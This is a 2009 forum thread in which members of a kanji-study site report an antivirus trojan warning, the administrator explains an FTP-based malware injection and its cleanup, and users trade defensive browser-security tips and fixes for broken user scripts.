JS:Redirector-H2 [Trj] infection, or false positive?

Index » Feedback

 
Reply #1 - 2009 May 14, 8:39 pm
Burritolingus Member
From: United States of America Inc. Registered: 2008-10-09 Posts: 216 Website

I know Avast isn't exactly the most trustworthy antivirus when it comes to such things, but...

http://i33.photobucket.com/albums/d55/nachomancer/2009-05-14_202520.jpg

Cause for concern? This alert only appeared later in the day, as of a few hours ago.

Thought I should throw this out there in case something is up! Hoping it is indeed a false positive and nothing harmful or nefarious.

Reply #2 - 2009 May 14, 9:50 pm
atylmo Member
From: USA Registered: 2008-08-05 Posts: 124

I'm pretty sure it's a false positive. I kept getting the same trojan message on another site I use but recently it stopped coming up.

I never had Avast puke on me about this site though.

Reply #3 - 2009 May 14, 11:38 pm
resolve Member
From: 山口 Registered: 2007-05-29 Posts: 919 Website

There is obfuscated javascript on the page which does indeed look suspicious:

Admin: thanks, edited out the script, there is no need to paste the whole javascript block in the post (it also triggers aVast warning)

Advertising (register and sign in to hide this)
JapanesePod101 Sponsor
 
Reply #4 - 2009 May 14, 11:42 pm
resolve Member
From: 山口 Registered: 2007-05-29 Posts: 919 Website

http://blog.unmaskparasites.com/2009/05 … ed-script/

If you're using Windows and not using anti-virus software, I'd stay off the site until Fabrice fixes this. The site does appear to have been trojaned

Reply #5 - 2009 May 15, 1:04 am
Burritolingus Member
From: United States of America Inc. Registered: 2008-10-09 Posts: 216 Website

That's what I was afraid of, Resolve. I'm having to disable Avast's web shield in order to reach this site at all, so I'm hoping noscript will block any malicious scripts (and recommend all Firefox users do the same).

Reply #6 - 2009 May 15, 9:25 am
ファブリス Administrator
From: Belgium Registered: 2006-06-14 Posts: 4021 Website

Thanks everyone.

I'm investigating into (as of typing, the site is down).

Briefly (please check the main site news), my FTP password was quite secure, there is not particular "hole" in the site or forum that I know of, and the exploit has hit many sites recently including some much bigger ones than RevTK.

UPDATE:

Please check today's news post

I'm sorry about the trouble this may have caused and the long down time.

This stupid malware ate most of my Friday and Saturday, time which I would have gladly spent working on the upcoming update. >_<   I'll do my best to update the site next week as I had intended.

The website cleanup was tricky because my local copy was a little different. The review page code is actually slightly different, and may interfere with some Greasemonkey scripts (though that should not matter too much given that the whole site will be updated with the refactored version next week).

If you see anything buggy please report here and I'll try to fix it asap, thank you.

Reply #7 - 2009 May 16, 1:48 pm
atylmo Member
From: USA Registered: 2008-08-05 Posts: 124

Heh, looks like I was way wrong. tongue

Reply #8 - 2009 May 16, 1:57 pm
sethg Member
From: m Registered: 2008-11-07 Posts: 505

atylmo wrote:

Heh, looks like I was way wrong. tongue

Haha, that was my first thought when the site came back up big_smile But hey, you were just trying to be optimistic... I was thinking the same thing.

Reply #9 - 2009 May 16, 3:39 pm
Codexus Member
From: Switzerland Registered: 2007-11-27 Posts: 721

A few security tips:

- The web would be a much safer place without Javascript and Flash but unfortunately it has become hard to avoid those completely so install the NoScript extension and only enable javascript and flash for sites that you trust and really need it. (as we have seen, even our favorite site can become infested by something but still this reduces the risks.)

- Make sure you have the latest versions of Flash and Acrobat Reader. The old versions have commonly used exploits.

- Disable the JavaScript support in Acrobat Reader. I've never seen a pdf file that used that for anything useful and almost all the latest pdf exploits can be prevented by that simple measure. I believe even the latest version is currently vulnerable if javascript is turned on.

- Disable the pdf plugin in your browser. You don't need it (just save the pdfs you really want to see) and anyway it's annoying and sometimes makes the browser crash.

- Also disable any browser plugin you don't really need and make sure those you keep are up to date.

Last edited by Codexus (2009 May 16, 3:39 pm)

Reply #10 - 2009 May 16, 4:02 pm
ueshiba Member
From: Portugal Registered: 2008-10-30 Posts: 19

Congrats on putting it up again so fast, thank you so much. On friday during the morning my anti virus warn me of that trojan when i tried to enter the website, and it blocked it for me. I thought of going to my college public pc, so i wouldnt get my home pc infected, and post a warning here on the forum, but when i got the chance to do it, the site was already for maintenance.
Thank god for my G Data security center=)), it didnt allow my computer to get infected.
Again thank you for such quick solving this, and ffs i hope those hackers get infected by some1 else themselves.
loool now i have 60 expired kanji!

Last edited by ueshiba (2009 May 16, 4:03 pm)

Reply #11 - 2009 May 16, 4:06 pm
ファブリス Administrator
From: Belgium Registered: 2006-06-14 Posts: 4021 Website

Codexus wrote:

- Make sure you have the latest versions of Flash and Acrobat Reader. The old versions have commonly used exploits.

Yeah, I was using Adobe Reader version 7, because the newer versions had become so bloated and slow. I didn't realize Adobe's plugins could be exploited so easily by a trojan. It may have been how my PC got infected.

I don't even use it! Last time I checked version 9 still couldn't remember the last used page of recently opened documents. FoxitReader can do that.

For now I have uninstalled Adobe Reader as part of the cleanup operation.. if I have to install it again, I'll get the latest version.

Great suggestions about browser plugins.. I didn't think of simply disabling them, always annoys me when the browser opens a PDF file instead of letting the dedicated app handle it!

Reply #12 - 2009 May 16, 4:41 pm
rich_f Member
From: north carolina Registered: 2007-07-12 Posts: 1708

I never even bother to install acrobat anymore on my PCs. I just go ahead and install Foxit. It runs a heck of a lot faster, and without all of that bloat.

Advertisers won't like it, but I like Adblock Plus as well for keeping down the number of "disease" vectors. But I agree that it's hard to beat noscript for effectiveness.

Reply #13 - 2009 May 16, 4:46 pm
Transparent_Aluminium Member
From: Canada Registered: 2008-06-30 Posts: 168

I think you should warn users of this in the "Announcement" space. I'm sure a lot of people don't ever bother to scroll down the main page or check the Feedback forum.

Also, from what time till what time do you estimate the virus was live on the site?

Last edited by Transparent_Aluminium (2009 May 16, 4:46 pm)

Reply #14 - 2009 May 16, 5:29 pm
Zarxrax Member
From: North Carolina Registered: 2008-03-24 Posts: 949

Since the site has come back up, reviewing doesn't seem to work for me? Is there still a problem? I go to review, and a kanji never appears.

Reply #15 - 2009 May 16, 6:35 pm
ファブリス Administrator
From: Belgium Registered: 2006-06-14 Posts: 4021 Website

Zarxrax: please try again, if it doesn't work, try the Refresh button on the browser or CTRL-F5 in Windows, this should clear the cache from old javascript files.

Reply #16 - 2009 May 16, 6:58 pm
ファブリス Administrator
From: Belgium Registered: 2006-06-14 Posts: 4021 Website

Transparent_Aluminium wrote:

Also, from what time till what time do you estimate the virus was live on the site?

The script/hacker logged in onto FTP and inserted the malware at around 5 PM US time Thrusday. It was about midnight here in Brussels. I went to sleep, and saw Burritolingus's post only the next day in the afternoon, so it was able to run free about 16 hours. Yep, shame I'm not a zombie wink

Reply #17 - 2009 May 16, 7:50 pm
squeaky_lill_mk Member
From: Germany Registered: 2009-03-23 Posts: 18

Thanks ファブリス, you are doing a great job! I'm so glad that the site is back up again!

Reply #18 - 2009 May 16, 8:20 pm
Evil_Dragon Member
From: Germany Registered: 2008-08-21 Posts: 683

ファブリス wrote:

Zarxrax: please try again, if it doesn't work, try the Refresh button on the browser or CTRL-F5 in Windows, this should clear the cache from old javascript files.

Did not work for me (using Firefox) sad It does work in IE.. but without greasemonkey.

Reply #19 - 2009 May 16, 8:23 pm
markal Member
From: Tokyo Registered: 2007-10-22 Posts: 84

It seems to be an issue with the substitute kanji script. Turn it off and the page loads normally. The substitute font script works OK.

Reply #20 - 2009 May 17, 1:12 am
Evil_Dragon Member
From: Germany Registered: 2008-08-21 Posts: 683

Substitute Keywords for me.. tried to review in English, but to no avail. wink I guess it will be no reviews at all for at least a week. Thanks to whoever is responsible...
He probably does not know the horrors of having to review 500+ Kanji. wink

Reply #21 - 2009 May 17, 1:38 am
woelpad Member
From: Chiba Registered: 2006-11-07 Posts: 425

Fixed it. Affected scripts were Substitute keywords and Alter sequence.

ファブリス wrote:

The website cleanup was tricky because my local copy was a little different. The review page code is actually slightly different, and may interfere with some Greasemonkey scripts (though that should not matter too much given that the whole site will be updated with the refactored version next week).

We have a date! I'm aware that the update might make large parts of above scripts obsolete, still a week is a lot of reviews. Can't let the customers lose faith.

Reply #22 - 2009 May 17, 1:49 am
Thora Member
From: Canada Registered: 2007-02-23 Posts: 1691

Deep curtsy to Fabrice and Woelpad.

Reply #23 - 2009 May 17, 4:39 am
aiken Member
From: Cardiff Registered: 2009-01-03 Posts: 11

I have the same problem as Evil_Dragon, does this mean I just have to wait now and it will be fixed in a few days?

Reply #24 - 2009 May 17, 6:13 am
woelpad Member
From: Chiba Registered: 2006-11-07 Posts: 425

No, you follow the link(s) I gave in the previous message and press the Install button.

Reply #25 - 2009 May 17, 7:56 am
aiken Member
From: Cardiff Registered: 2009-01-03 Posts: 11

thanks! works again. I feel stupid now but thanks for having patience with slow people like me ^^;